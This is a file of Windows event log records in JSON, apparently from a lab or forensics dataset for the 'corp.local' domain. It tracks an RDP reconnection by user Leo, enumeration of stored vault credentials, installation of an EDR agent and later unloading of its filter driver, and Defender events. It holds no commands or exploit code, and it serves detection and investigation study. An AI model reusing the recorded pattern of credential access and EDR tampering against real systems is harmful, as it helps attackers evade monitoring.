{"EventTime":"2021-09-29T12:42:46.620573+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1501,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":82718,"ActivityID":"{E90BEC84-D5B2-416B-8F39-25931089BDD6}","ExecutionProcessID":1976,"ExecutionThreadID":6920,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The Group Policy settings for the user were processed successfully. There were no changes detected since the last successful processing of Group Policy.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4292","ProcessingMode":"0","ProcessingTimeInMilliseconds":"1719","DCName":"\\\\DC01.corp.local","EventReceivedTime":"2021-09-29T12:42:47.441525+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T09:47:45.252964+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5381,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18988216,"ExecutionProcessID":724,"ExecutionThreadID":7932,"Channel":"Security","Message":"Vault credentials were read.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nThis event occurs when a user enumerates stored vault credentials.","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","Flags":"0","CountOfCredentialsReturned":"0","ProcessCreationTime":"2021-09-29T04:02:36.8912132Z","ClientProcessId":"3100","EventReceivedTime":"2021-09-29T09:47:47.138027+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T11:28:23.891245+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1013,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22626,"ExecutionProcessID":2080,"ExecutionThreadID":4924,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has removed history of malware and other potentially unwanted software.\r\n \tTime: 9/14/2021 11:28:23 AM\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Timestamp":"9/14/2021 11:28:23 AM","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-09-29T11:28:25.013013+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:18.642065+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82712,"ExecutionProcessID":704,"ExecutionThreadID":3336,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"A service was installed in the system.\r\n\r\nService Name: EDR Agent activity monitor\r\nService File Name: C:\\Windows\\system32\\drivers\\edrdrv.sys\r\nService Type: kernel mode driver\r\nService Start Type: disabled\r\nService Account: ","ServiceName":"EDR Agent activity monitor","ImagePath":"C:\\Windows\\system32\\drivers\\edrdrv.sys","ServiceType":"kernel mode driver","StartType":"disabled","EventReceivedTime":"2021-09-29T12:37:20.224893+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:18.645270+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4697,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":18988812,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":8476,"Channel":"Security","Message":"A service was installed in the system.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nService Information:\r\n\tService Name: \t\tedrdrv\r\n\tService File Name:\tC:\\Windows\\system32\\drivers\\edrdrv.sys\r\n\tService Type: \t\t0x2\r\n\tService Start Type:\t4\r\n\tService Account: \t\tLocalSystem","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ServiceName":"edrdrv","ServiceFileName":"C:\\Windows\\system32\\drivers\\edrdrv.sys","ServiceType":"0x2","ServiceStartType":"4","ServiceAccount":"LocalSystem","ClientProcessStartKey":"15762598695915713","ClientProcessId":"8420","ParentProcessId":"1876","EventReceivedTime":"2021-09-29T12:37:20.224893+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.821567+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"VERBOSE","SeverityValue":1,"Severity":"DEBUG","EventID":306,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4540,"ExecutionProcessID":356,"ExecutionThreadID":1344,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The BITS service loaded the job list from disk.","Opcode":"Info","EventReceivedTime":"2021-09-29T19:56:40.652026+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:34.168267+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":261,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":2152,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":788,"ExecutionThreadID":1488,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Listener RDP-Tcp received a connection","Opcode":"Info","EventXML.listenerName":"RDP-Tcp","EventReceivedTime":"2021-09-29T12:33:35.801222+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.866523+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14336,"OpcodeValue":0,"RecordNumber":190831589,"ExecutionProcessID":512,"ExecutionThreadID":2544,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tLeo\r\nSource Workstation:\t192.168.2.54\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Leo","Workstation":"192.168.2.54","Status":"0x0","EventReceivedTime":"2021-09-29T12:33:38.569653+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.373298+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1149,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":2153,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":788,"ExecutionThreadID":8068,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Remote Desktop Services: User authentication succeeded:\r\n\r\nUser: Leo\r\nDomain: CORP\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.Param1":"Leo","EventXML.Param2":"CORP","EventXML.Param3":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:37.880293+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.940494+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4778,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18988672,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":8476,"Channel":"Security","Message":"A session was reconnected to a Window Station.\r\n\r\nSubject:\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nSession:\r\n\tSession Name:\t\tRDP-Tcp#15\r\n\r\nAdditional Information:\r\n\tClient Name:\t\tHOME-PC\r\n\tClient Address:\t\t172.16.20.11\r\n\r\nThis event is generated when a user reconnects to an existing Terminal Services session, or when a user switches to an existing desktop using Fast User Switching.","Category":"Other Logon/Logoff Events","Opcode":"Info","AccountName":"Leo","AccountDomain":"CORP","LogonID":"0x28632a42","SessionName":"RDP-Tcp#15","ClientName":"HOME-PC","ClientAddress":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:37.895969+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:45.296643+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3976,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":9480,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Session 7 has been disconnected, reason code 12","Opcode":"Info","EventXML.Session":"7","EventXML.Reason":"12","EventReceivedTime":"2021-09-29T14:19:46.787389+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:37.510690+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":25,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3974,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":4136,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session reconnection succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:38.999043+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:33:55.432626+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4611,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":18989195,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":10092,"Channel":"Security","Message":"A trusted logon process has been registered with the Local Security Authority.\r\nThis logon process will be trusted to submit logon requests.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Process Name:\t\tConsentUI","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","LogonProcessName":"ConsentUI","EventReceivedTime":"2021-09-29T13:33:56.960150+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:39.521508+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4801,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18988718,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":3660,"Channel":"Security","Message":"The workstation was unlocked.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\tSession ID:\t7","Category":"Other Logon/Logoff Events","Opcode":"Info","TargetUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","TargetUserName":"Leo","TargetDomainName":"CORP","TargetLogonId":"0x28632a42","SessionId":"7","EventReceivedTime":"2021-09-29T12:33:41.494415+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:33:18.332524+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1040,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69837,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Beginning a Windows Installer transaction: {45CC556C-A03B-42FF-A2FE-000000000000}. Client Process Id: 7408.","Opcode":"Info","Data":"{45CC556C-A03B-42FF-A2FE-000000000000}","Data_1":"7408","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventReceivedTime":"2021-09-29T13:33:19.589725+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:50.727611+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2010,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22632,"ExecutionProcessID":2080,"ExecutionThreadID":3424,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus used Dynamic security intelligence Service to retrieve additional security intelligence to help protect your machine.\r\n \tCurrent security intelligence Version: 1.349.1604.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUser: \\\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tDynamic security intelligence Type: Security intelligence update\r\n \tPersistence Path: C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\e5c7d6a054295bc4ed605418a7c26baf4a8cbaa6\r\n \tDynamic security intelligence Version: 0.0.0.0\r\n \tDynamic security intelligence Compilation Timestamp: 9/29/2021 6:52:46 AM\r\n \tPersistence Limit Type: Duration\r\n \tPersistence Limit: 288000000","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1604.0","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Current Engine Version":"1.1.18500.10","Dynamic security intelligence Type Index":"1","Dynamic security intelligence Type":"Security intelligence update","Persistence Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\e5c7d6a054295bc4ed605418a7c26baf4a8cbaa6","Dynamic security intelligence Version":"0.0.0.0","Dynamic security intelligence Compilation Timestamp":"9/29/2021 6:52:46 AM","Persistence Limit Type Index":"2","Persistence Limit Type":"Duration","Persistence 
Limit Value":"288000000","EventReceivedTime":"2021-09-29T12:37:52.111118+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:20.678016+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-FilterManager","ProviderGuid":"{F3C5E28E-63F6-49C7-A204-E48A1BC4B09D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82715,"ExecutionProcessID":4,"ExecutionThreadID":5692,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File System Filter 'edrdrv' (10.0, ???2020???-???11???-???06T04:46:51.000000000Z) has successfully loaded and registered with Filter Manager.","Opcode":"Info","FinalStatus":"0x0","DeviceVersionMajor":"10","DeviceVersionMinor":"0","DeviceNameLength":"6","DeviceName":"edrdrv","DeviceTime":"2020-11-06T04:46:51.0000000Z","EventReceivedTime":"2021-09-29T12:37:22.448054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:30.512393+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1042,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69840,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Ending a Windows Installer transaction: {45CC556C-A03B-42FF-A2FE-000000000000}. Client Process Id: 7408.","Opcode":"Info","Data":"{45CC556C-A03B-42FF-A2FE-000000000000}","Data_1":"7408","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventReceivedTime":"2021-09-29T13:34:52.764572+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:25.971758+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1033,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69823,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Windows Installer installed the product. Product Name: EDR Agent v2. Product Version: 2.0.0.0. Product Language: 1033. Manufacturer: OpenEdr. Installation success or error status: 0.","Opcode":"Info","Data":"EDR Agent v2","Data_1":"2.0.0.0","Data_2":"1033","Data_3":"0","Data_4":"OpenEdr","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D3030303039323065343765663532383433393263373132393635616534306161626430633030303030393034","EventReceivedTime":"2021-09-29T12:37:27.037211+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:25.956078+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11707,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69822,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: EDR Agent v2 -- Installation completed successfully.","Opcode":"Info","Data":"Product: EDR Agent v2 -- Installation completed successfully.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D","EventReceivedTime":"2021-09-29T12:37:27.034272+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:50.046238+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":12,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":6,"OpcodeValue":0,"RecordNumber":1155,"ExecutionProcessID":856,"ExecutionThreadID":2944,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"Font Driver Host","AccountName":"UMFD-1","UserID":"S-1-5-96-0-1","AccountType":"Well Known Group","Message":"Process '\\Device\\HarddiskVolume2\\Windows\\System32\\fontdrvhost.exe' (PID 856) was blocked from loading the non-Microsoft-signed binary '\\Windows\\System32\\edrpm64.dll'.","Opcode":"Info","ProcessPathLength":"56","ProcessPath":"\\Device\\HarddiskVolume2\\Windows\\System32\\fontdrvhost.exe","ProcessCommandLineLength":"17","ProcessCommandLine":"\"fontdrvhost.exe\"","ProcessId":"856","ProcessCreateTime":"2021-09-14T04:54:13.7524072Z","ProcessStartKey":"15762598695796750","ProcessSignatureLevel":"8","ProcessSectionSignatureLevel":"8","ProcessProtection":"0","TargetThreadId":"2944","TargetThreadCreateTime":"2021-09-29T06:52:49.2088748Z","RequiredSignatureLevel":"8","SignatureLevel":"0","ImageNameLength":"29","ImageName":"\\Windows\\System32\\edrpm64.dll","EventReceivedTime":"2021-09-29T12:37:52.095409+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:39:45.238247+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":1156,"ExecutionProcessID":704,"ExecutionThreadID":5828,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process '\\Device\\HarddiskVolume2\\Windows\\System32\\services.exe' (PID 704) was blocked from generating dynamic code.","Opcode":"Info","ProcessPathLength":"53","ProcessPath":"\\Device\\HarddiskVolume2\\Windows\\System32\\services.exe","ProcessCommandLineLength":"6","ProcessCommandLine":"(null)","CallingProcessId":"704","CallingProcessCreateTime":"2021-09-14T04:54:12.8015502Z","CallingProcessStartKey":"15762598695796747","CallingProcessSignatureLevel":"62","CallingProcessSectionSignatureLevel":"12","CallingProcessProtection":"97","CallingThreadId":"5828","CallingThreadCreateTime":"2021-09-29T06:52:50.9589500Z","EventReceivedTime":"2021-09-29T12:39:47.715025+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:57:21.975531+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10016,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82729,"ActivityID":"{AEE21D71-D679-425B-BE22-ED0DE9FAF8DD}","ExecutionProcessID":972,"ExecutionThreadID":3884,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID \r\n{C2F03A33-21F5-47FA-B4BB-156362A2F239}\r\n and APPID \r\n{316CDED5-E4AE-4B15-9113-7055D84DCC97}\r\n to the user CORP\\Leo SID (S-1-5-21-2569713578-3403938347-3732993993-1139) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.ShellExperienceHost_10.0.19041.610_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708). This security permission can be modified using the Component Services administrative tool.","Opcode":"Info","param1":"machine-default","param2":"Local","param3":"Activation","param4":"{C2F03A33-21F5-47FA-B4BB-156362A2F239}","param5":"{316CDED5-E4AE-4B15-9113-7055D84DCC97}","param6":"CORP","param7":"Leo","param8":"S-1-5-21-2569713578-3403938347-3732993993-1139","param9":"LocalHost (Using LRPC)","param10":"Microsoft.Windows.ShellExperienceHost_10.0.19041.610_neutral_neutral_cw5n1h2txyewy","param11":"S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708","EventReceivedTime":"2021-09-29T12:57:23.299959+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:40:34.674701+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2050,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22636,"ExecutionProcessID":2080,"ExecutionThreadID":9532,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has uploaded a file for further analysis.\r\n \tFilename: C:\\Users\\Leo\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\n \tSha256: 76df4d5a685b0e4dc11a06d71e0e8f8677e1724ced7c1c739a0934bd28315565\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Filename":"C:\\Users\\Leo\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt","Sha256":"76df4d5a685b0e4dc11a06d71e0e8f8677e1724ced7c1c739a0934bd28315565","EventReceivedTime":"2021-09-29T12:40:36.358091+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:06.102103+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-FilterManager","ProviderGuid":"{F3C5E28E-63F6-49C7-A204-E48A1BC4B09D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82730,"ExecutionProcessID":4,"ExecutionThreadID":5348,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File System Filter 'edrdrv' (Version 10.0, ???2020???-???11???-???06T04:46:51.000000000Z) unloaded successfully.","Opcode":"Info","FinalStatus":"0x0","DeviceVersionMajor":"10","DeviceVersionMinor":"0","DeviceNameLength":"6","DeviceName":"edrdrv","DeviceTime":"2020-11-06T04:46:51.0000000Z","EventReceivedTime":"2021-09-29T13:34:52.566180+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
